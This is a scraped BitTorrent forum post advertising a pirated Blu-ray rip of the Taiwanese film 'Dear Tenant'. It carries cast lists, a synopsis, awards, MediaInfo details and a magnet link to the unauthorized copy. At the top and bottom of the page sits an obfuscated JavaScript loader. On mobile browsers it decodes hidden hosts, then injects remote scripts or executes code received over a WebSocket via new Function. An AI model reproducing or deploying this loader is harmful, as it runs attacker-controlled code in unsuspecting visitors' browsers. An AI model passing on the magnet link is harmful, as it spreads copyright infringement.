亲爱的房客[国语配音/中文字幕].Dear.Tenant.2020.1080p.BluRay.x265.10bit.DTS-bt9527.CC 5.25GB

版主小s 20天前 294

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 亲爱的房客 / Dear Tenant

◎片 名 親愛的房客

◎年 代 2020

◎产 地 中国台湾

◎类 别 剧情 / 同性

◎语 言 汉语普通话

◎上映日期 2020-10-23(中国台湾) / 2021-02-18(中国台湾网络) / 2020-07-04(台北电影节)

◎IMDb链接 https://www.imdb.com/title/tt12359272/

◎豆瓣评分 7.5/10 (12831人评价)

◎豆瓣链接 https://movie.douban.com/subject/35069520/

◎片 长 106分钟

◎导 演 郑有杰 Yu-Chieh Cheng (id:1315038)

◎编 剧 郑有杰 Yu-Chieh Cheng (id:1315038)

◎演 员 莫子仪 Tzu-yi Mo (id:1274355)

陈淑芳 Shu-Fang Chen (id:1339273)

白润音 Run-yin Bai (id:1357693)

吴朋奉 Pong Fong Wu (id:1348865)

谢琼煖 Chiung-Hsuan Hsieh (id:1348864)

姚淳耀 Jack Yao (id:1314533)

是元介 Jay Shin (id:1275953)

沈威年 Nelson (id:1314994)

王可元 Tommi Wang (id:1414347)

陈雪甄 Vera Chen (id:1423723)

胡广雯 Iris (id:1443500)

朱宥丞 Edward Chu (id:1375184)

杨雅喆 Ya-che Yang (id:1319263)

郑有杰 Yu-Chieh Cheng (id:1315038)

林仕肯 Shih-Ken Lin (id:1452665)

江怡箴 (id:1452685)

詹馥瑜 (id:1452686)

法兰 Fran Chen (id:1446043)

张宇翰 Meteor Cheung (id:1417679)

陈柏佑 Po-You Chen (id:1449696)

陈晓东 Hsiao-tong Chen (id:1316580)

郑有杰 Yu-Chieh Cheng (id:1315038)

陈俊宏 Chun-Hung Chen (id:1405906)

金仲华 Chung-Hwa Chin (id:1452670)

洪文凯 Wen-Kai Hung (id:1452687)

胡乃婷 Jill Hu (id:1449693)

陈柏任 Po-Jen Chen (id:1331965)

黄明仁 Ming-Jen Huang (id:1449694)

璐尼·绍玛·吉维力安 Elaine Chiu-Ling Chen (id:1449695)

张钰苹 (id:1452684)

蔡翰升 Hanson Tsai (id:1452671)

陈亦伟 Aki Chen (id:1449708)

刘惟熠 Wei-Yi Liu (id:1382408)

◎标 签 台湾 / 同性 / LGBT / 剧情 / 2020 / 莫子仪 / 家庭 / 中国台湾

◎简 介

林健一(莫子仪 饰)是住在顶楼的房客,但他不只照顾年迈患病的房东周秀玉(陈淑芳 饰),还收养了她9岁的孙子王悠宇(白润音 饰),这一切看似超出普通房客的行为动机,在周秀玉去世后受到质疑,很多人怀疑他是为了顺理成章的获得遗产,他百口莫辩,因为这些举动背后隐藏着一段不被承认的感情,也更是他思念一个人的方式,而那个人正是房东已经过世的儿子…

◎获奖情况 (共4项)

第15届亚洲电影大奖 (2021)

最佳男主角(提名)

└──莫子仪 (id:1274355)

第22届台北电影节 (2020)

台北电影奖 最佳男主角奖

└──莫子仪 (id:1274355)

台北电影奖 最佳女配角奖(提名)

└──陈淑芳 (id:1339273)

台北电影奖 最佳美术设计(提名)

└──陈柏任 (id:1331965)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 180830041612440035730809366922303247344 (0x880A996514A7A20E2F45177DD3DE13F0)

  4. Complete name : [email protected]v

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 5.21 GiB

  8. Duration : 1 h 46 min

  9. Overall bit rate : 7 007 kb/s

  10. Encoded date : UTC 2021-11-13 01:42:24

  11. Writing application : mkvmerge v60.0.0 ('Are We Copies?') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 46 min

  20. Bit rate : 5 482 kb/s

  21. Width : 1 920 pixels

  22. Height : 804 pixels

  23. Display aspect ratio : 2.40:1

  24. Frame rate mode : Constant

  25. Frame rate : 24.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.148

  30. Stream size : 4.08 GiB (78%)

  31. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  32. Encoding settings : rc=crf / crf=14.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=14 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=3 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x804 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  33. Default : Yes

  34. Forced : No


  35. Audio

  36. ID : 2

  37. Format : DTS

  38. Format/Info : Digital Theater Systems

  39. Codec ID : A_DTS

  40. Duration : 1 h 46 min

  41. Bit rate mode : Constant

  42. Bit rate : 1 510 kb/s

  43. Channel(s) : 6 channels

  44. Channel layout : C L R Ls Rs LFE

  45. Sampling rate : 48.0 kHz

  46. Frame rate : 93.750 FPS (512 SPF)

  47. Bit depth : 24 bits

  48. Compression mode : Lossy

  49. Stream size : 1.12 GiB (22%)

  50. Title : Mandarin

  51. Language : Chinese

  52. Default : Yes

  53. Forced : No


  54. Text #1

  55. ID : 3

  56. ID in the original source medium : 4608 (0x1200)

  57. Format : PGS

  58. Muxing mode : zlib

  59. Codec ID : S_HDMV/PGS

  60. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  61. Duration : 1 h 41 min

  62. Bit rate : 18.8 kb/s

  63. Count of elements : 1561

  64. Stream size : 13.7 MiB (0%)

  65. Title : cht

  66. Language : Chinese

  67. Default : Yes

  68. Forced : No

  69. Original source medium : Blu-ray


  70. Text #2

  71. ID : 4

  72. ID in the original source medium : 4609 (0x1201)

  73. Format : PGS

  74. Muxing mode : zlib

  75. Codec ID : S_HDMV/PGS

  76. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  77. Duration : 1 h 41 min

  78. Bit rate : 21.2 kb/s

  79. Count of elements : 1570

  80. Stream size : 15.4 MiB (0%)

  81. Title : eng

  82. Language : English

  83. Default : Yes

  84. Forced : No

  85. Original source medium : Blu-ray


  86. Menu

  87. 00:00:00.000 : 第 01 章

  88. 00:08:54.041 : 第 02 章

  89. 00:18:08.541 : 第 03 章

  90. 00:26:54.916 : 第 04 章

  91. 00:36:12.500 : 第 05 章

  92. 00:44:06.083 : 第 06 章

  93. 00:56:00.458 : 第 07 章

  94. 01:04:10.375 : 第 08 章

  95. 01:11:54.541 : 第 09 章

  96. 01:22:04.625 : 第 10 章

  97. 01:32:12.083 : 第 11 章

  98. 01:38:48.000 : 第 12 章




复制代码


TAGS 剧情 同性

磁力链:
  • magnet:?xt=urn:btih:7B560B0E85E7AB2C12E5BB57C290BFB874D1EFBD

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};